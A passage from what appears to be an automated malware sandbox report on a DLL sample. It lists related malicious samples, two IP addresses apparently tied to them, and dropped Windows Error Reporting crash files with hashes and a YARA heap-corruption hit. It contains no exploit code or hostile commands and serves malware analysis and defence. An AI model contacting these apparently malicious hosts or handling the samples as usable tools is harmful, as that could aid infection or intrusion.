                                                          457aedfd_by_Libranalysis.dllGet hashmaliciousBrowse
                                                            edae86a8_by_Libranalysis.dllGet hashmaliciousBrowse
                                                              95.138.161.2263138bf3b_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                fc0bc077_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                  e1c88b94_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                    577e66d4_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                      b8fe43e6_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                        f845ef61_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                          3c271eae_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                            fc0bc077_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                              e1c88b94_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                8743016c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                  d8417415_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                    9a46403f_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      edae86a8_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                        457aedfd_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                          64b8ed95_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                            8743016c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                              d8417415_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                c977c96e_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                  9a46403f_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                    457aedfd_by_Libranalysis.dllGet hashmaliciousBrowse

                                                                                                      Domains

                                                                                                      No context

                                                                                                      ASN

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      RACKSPACE-LONGB3138bf3b_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 95.138.161.226
                                                                                                      fc0bc077_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 95.138.161.226
                                                                                                      e1c88b94_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 95.138.161.226
                                                                                                      577e66d4_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 95.138.161.226
                                                                                                      b8fe43e6_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 95.138.161.226
                                                                                                      f845ef61_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 95.138.161.226
                                                                                                      3c271eae_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 95.138.161.226
                                                                                                      fc0bc077_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 95.138.161.226
                                                                                                      e1c88b94_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 95.138.161.226
                                                                                                      8743016c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 95.138.161.226
                                                                                                      d8417415_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 95.138.161.226
                                                                                                      9a46403f_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 95.138.161.226
                                                                                                      edae86a8_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 95.138.161.226
                                                                                                      457aedfd_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 95.138.161.226
                                                                                                      64b8ed95_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 95.138.161.226
                                                                                                      8743016c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 95.138.161.226
                                                                                                      d8417415_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 95.138.161.226
                                                                                                      c977c96e_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 95.138.161.226
                                                                                                      9a46403f_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 95.138.161.226
                                                                                                      457aedfd_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 95.138.161.226
                                                                                                      OVHFRfc0bc077_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 167.114.113.13
                                                                                                      e1c88b94_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 167.114.113.13
                                                                                                      577e66d4_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 167.114.113.13
                                                                                                      b8fe43e6_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 167.114.113.13
                                                                                                      f845ef61_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 167.114.113.13
                                                                                                      3c271eae_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 167.114.113.13
                                                                                                      fc0bc077_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 167.114.113.13
                                                                                                      e1c88b94_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 167.114.113.13
                                                                                                      8743016c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 167.114.113.13
                                                                                                      d8417415_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 167.114.113.13
                                                                                                      9a46403f_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 167.114.113.13
                                                                                                      edae86a8_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 167.114.113.13
                                                                                                      457aedfd_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 167.114.113.13
                                                                                                      64b8ed95_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 167.114.113.13
                                                                                                      8743016c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 167.114.113.13
                                                                                                      d8417415_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 167.114.113.13
                                                                                                      c977c96e_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 167.114.113.13
                                                                                                      9a46403f_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 167.114.113.13
                                                                                                      457aedfd_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 167.114.113.13
                                                                                                      edae86a8_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                      • 167.114.113.13

                                                                                                      JA3 Fingerprints

                                                                                                      No context

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_01d168c7\Report.wer
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):12694
                                                                                                      Entropy (8bit):3.772676232741872
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:mmih0oXnRH4+V/Ojed+GoR/u7srS274ItWce:PiPXnh4+VGjew/u7srX4ItWce
                                                                                                      MD5:724CCCDCE7BF8F97A60967AEB8111DE6
                                                                                                      SHA1:BFBCAE117AE6E6CECD4A564767D32A772240E5A0
                                                                                                      SHA-256:5724C11002177C1830D8176BE7AA1F22DA948D78D0EC71A536349FBBED525E75
                                                                                                      SHA-512:3C05C5E16887C57D261EE50DB231F923BAE1E71887C5FB8626FCBF680B4D66049EC9075327C5DD76CE628BEFC1BD59A89FC1FD4D0301BF315959B885871574A3
                                                                                                      Malicious:false
                                                                                                      Yara Hits:
                                                                                                      • Rule: SUSP_WER_Critical_HeapCorruption, Description: Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation), Source: C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_01d168c7\Report.wer, Author: Florian Roth
                                                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.6.6.3.5.8.7.0.4.7.7.5.4.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.4.6.6.3.6.0.8.0.0.0.8.2.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.b.b.a.f.8.b.e.-.5.d.8.5.-.4.b.9.7.-.8.0.2.6.-.4.2.5.b.7.4.3.7.e.0.6.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.9.c.b.9.f.c.-.0.4.c.f.-.4.0.8.8.-.a.f.4.1.-.a.2.4.7.1.c.3.8.6.8.a.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.2.8.4.-.0.0.0.1.-.0.0.1.7.-.b.4.8.5.-.c.2.6.c.6.9.4.1.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_1790f1d2\Report.wer
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):12702
                                                                                                      Entropy (8bit):3.7726119025378333
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:Cmi90oXoRH4+V/Ojed+GgR/u7sQS274ItWcV:ziTXoh4+VGjeI/u7sQX4ItWcV
                                                                                                      MD5:7530591422F53CC1FD077A04534DEC56
                                                                                                      SHA1:D099A6A1FAA5C93F97D3DC47F4D9C27BD4A473A4
                                                                                                      SHA-256:1C6C55583AA7C845837F1F4E5B9CD06EF94E640B4BDF7A47B68A565B75EA50C6
                                                                                                      SHA-512:7C09F011821183050BC09CDCE2D6BE44822A6DEC5E930AEE5BBC2037EDDC0F11AE7A05874DCEAF4213C510230C659E03F14E8DF74F6D5F210224055A294501FB
                                                                                                      Malicious:false
                                                                                                      Yara Hits:
                                                                                                      • Rule: SUSP_WER_Critical_HeapCorruption, Description: Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation), Source: C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_1790f1d2\Report.wer, Author: Florian Roth
                                                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.6.6.3.5.0.7.2.5.9.4.4.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.4.6.6.3.5.7.7.6.5.7.1.6.0.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.5.9.7.d.3.0.-.7.9.4.7.-.4.9.e.0.-.b.4.3.0.-.8.a.d.5.f.7.1.5.4.6.b.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.7.a.5.0.9.4.c.-.c.b.d.2.-.4.7.d.b.-.9.0.6.8.-.2.8.4.b.9.6.6.d.9.3.d.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.1.0.-.0.0.0.1.-.0.0.1.7.-.0.3.8.9.-.5.8.5.1.6.9.4.1.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_70ca6d92bb7cd6d05a398077544511f8e964d76_82810a17_0d9d6e75\Report.wer
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):12772
                                                                                                      Entropy (8bit):3.7713623140181887
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:oZByWig0oXjHBUZMX4jed+GYR/u7srS274It7c9:ITi2XjBUZMX4jeg/u7srX4It7c9
                                                                                                      MD5:F4088892FA938EA3AC2CC5C718E5A5F5
                                                                                                      SHA1:9C133CE8CCD50EA62C2120455FCA2B87A5B43042
                                                                                                      SHA-256:F3CE5AC21DF90EE7416BB7D4BBA3606984FC1283FDED0828FED58182416C94E2
                                                                                                      SHA-512:DAEB3A9828DE54758C1AEC938308B3670CEAADB43BA0E42A0AC884423AE835328434EB5E56163F1BD2C9A00C4FFDFD1241888DACB99B0FA8232EAE5980034F85
                                                                                                      Malicious:false
                                                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.6.6.3.5.8.7.1.4.1.4.9.1.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.4.6.6.3.6.0.9.3.9.1.3.9.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.5.5.6.e.5.f.-.e.2.b.d.-.4.9.c.c.-.a.2.d.5.-.2.f.3.b.2.3.c.b.4.c.f.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.c.1.6.9.d.a.b.-.b.b.f.2.-.4.1.8.8.-.b.2.5.f.-.1.3.1.b.6.4.d.9.1.1.7.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.7.4.-.0.0.0.1.-.0.0.1.7.-.9.a.4.3.-.e.b.6.c.6.9.4.1.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_83abab8e5de515701b774b3934596496ffb63d4d_82810a17_0eed6a2f\Report.wer
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):12688
                                                                                                      Entropy (8bit):3.765666500931055
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:mXid0oXLEHBUZMX4jed+GgR/u7srS274ItWco:eizXwBUZMX4jeI/u7srX4ItWco
                                                                                                      MD5:F02B93D088D2D548E34121FCA71FAAB7
                                                                                                      SHA1:CC484C674374B3C49E129F99BDBD9E6C35C46E90
                                                                                                      SHA-256:B8003577F9C2418806B88CE1CF2757A7F46AD0C137045DF329C5CF1728C0275E
                                                                                                      SHA-512:F4747795415B355C5D39FCC43B07402A36B03BCC983DBDE9B33C8511A26E0CB7C64F15E7589333F05BFE0DDA0346430D96B61A6B92E1F463D380AF1C21955591
                                                                                                      Malicious:false
                                                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.6.6.3.5.8.9.0.6.3.3.5.9.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.4.6.6.3.6.0.9.8.1.3.2.6.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.2.0.2.6.7.f.7.-.3.d.6.5.-.4.2.7.1.-.8.f.2.c.-.5.3.e.a.1.6.4.9.b.c.0.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.d.2.b.f.5.a.-.0.e.4.c.-.4.4.9.8.-.b.3.2.8.-.4.e.a.0.5.9.8.2.6.f.c.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.7.4.-.0.0.0.1.-.0.0.1.7.-.a.d.7.0.-.7.e.6.d.6.9.4.1.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_a448481dbb8c9a9489f46034d2e685b2c21_82810a17_1770e3a9\Report.wer
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):12868
                                                                                                      Entropy (8bit):3.756967753187539
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:+iW0oXSFHVzOMjed+GA8/u7sQS274It7cy:+iQXYVzOMje1/u7sQX4It7cy
                                                                                                      MD5:C6DC5076C1B4604BF453651DD5156567
                                                                                                      SHA1:6C37188D7683072F9D61FD071B126725084FC135
                                                                                                      SHA-256:06065D782D8ECEE8C02CE1E66AE3BA1EF3CAAAFF013EC13B544C9B8B05154475
                                                                                                      SHA-512:4D64D55260752E5E0B6B70548285D0B4ED30A8FA05B2796C568CBD70A42E172F7CF972A3243A9A4966058F2BAF9D2C27AEACDC0158A469B27C0D4B3E9BF416FB
                                                                                                      Malicious:false
                                                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.6.6.3.5.0.9.3.2.1.9.3.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.2.5.6.b.6.1.2.-.5.3.f.1.-.4.6.9.5.-.b.a.2.a.-.f.8.8.e.4.8.4.4.9.6.b.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.2.6.c.7.f.a.-.9.6.f.4.-.4.f.c.f.-.a.7.6.7.-.e.5.c.8.d.1.c.d.8.c.d.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.e.c.-.0.0.0.1.-.0.0.1.7.-.d.4.1.b.-.5.0.5.1.6.9.4.1.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.u.n.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.8.6././.0.1././.3.0.:.1.1.:.4.2.:.4.4.!.1.0.3.d.
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER124B.tmp.dmp
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Mini DuMP crash report, 14 streams, Wed May 5 04:46:33 2021, 0x1205a4 type
                                                                                                      Category:dropped
                                                                                                      Size (bytes):41020
                                                                                                      Entropy (8bit):2.459409118085861
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:0mPXShZfZsGwuT23XecTocwMM7NPJeWwH6vhTPuHpFnSj:0uCwuT23zdSxesvVWf8
                                                                                                      MD5:7592E8F98EAF1DE5AACF4B081F7010A4
                                                                                                      SHA1:2A83381D133E627050ECF6C984CEC7777C036BBF
                                                                                                      SHA-256:B973D9C8C08ADD96ECF9379A25CB134DE694D48DD948F3E9A51686CF1C145F44
                                                                                                      SHA-512:EC42BF8F3DA0737498EC2963F6535F19D289EF799FF5A56017F95C0983DADB8AB3126ACC05FDEA148B3B61BBA54EA43F7A6D3EB2EC6ABE3D8E830CA0CDD3C731
                                                                                                      Malicious:false
                                                                                                      Preview: MDMP....... .......)#.`...................U...........B......P ......GenuineIntelW...........T.......t....".`.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER20E2.tmp.WERInternalMetadata.xml
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8324
                                                                                                      Entropy (8bit):3.7023747472610182
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:Rrl7r3GLNijH69D6YY56DscgmfTHPSXPCpr289blTsf33m:RrlsNij6Z6Ym6DscgmfTHPSol4fm
                                                                                                      MD5:82B5E03C68F377CA1E5FE46EFDAC4E41
                                                                                                      SHA1:91BC2F95C61249C6AB4BA0AEB93EF2257658647B
                                                                                                      SHA-256:F5D06F79B983F4DACA827E9E1155BAFB0DDD33DDE80F4E0F88DA355AD959FF52
                                                                                                      SHA-512:B8A15813B9388539B5A0EFED0F2B8E26AEEED0B3B8F470208B11CD7FAF80B641277508A37D0BC7AB8B6D92952B4EB093E30D16A6ACBB85873D823D5A5F40262F
                                                                                                      Malicious:false
                                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.4.<./.P.i.d.>.........
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER21DC.tmp.WERInternalMetadata.xml
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8382
                                                                                                      Entropy (8bit):3.696186966396553
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:Rrl7r3GLNi8MJ6CE6YY76Dscgmf8eSBCpr+89blOsfdByT3m:RrlsNiR6p6YE6Dscgmf8eSulNfzn
                                                                                                      MD5:D8D0D9EB233F7D0CE0909DFC3616B206
                                                                                                      SHA1:20186014EDB629408F5BE5D0AC0C466EA0F27210
                                                                                                      SHA-256:61A83221C1946D824C84D566509E7564DDE4B6A39C8FFF6514AF6617407ADDE0
                                                                                                      SHA-512:64E9026B5E5D39F5B5550D16EA022B4154E0A6BEC89F7652491410CD1A6C70F06E30AD14306BAE5313BC14DE1530B5D3FA5AC6F6559CC98E5A40C5179904B68B
                                                                                                      Malicious:false
                                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.0.4.<./.P.i.d.>.......
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER26FD.tmp.WERInternalMetadata.xml
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8314
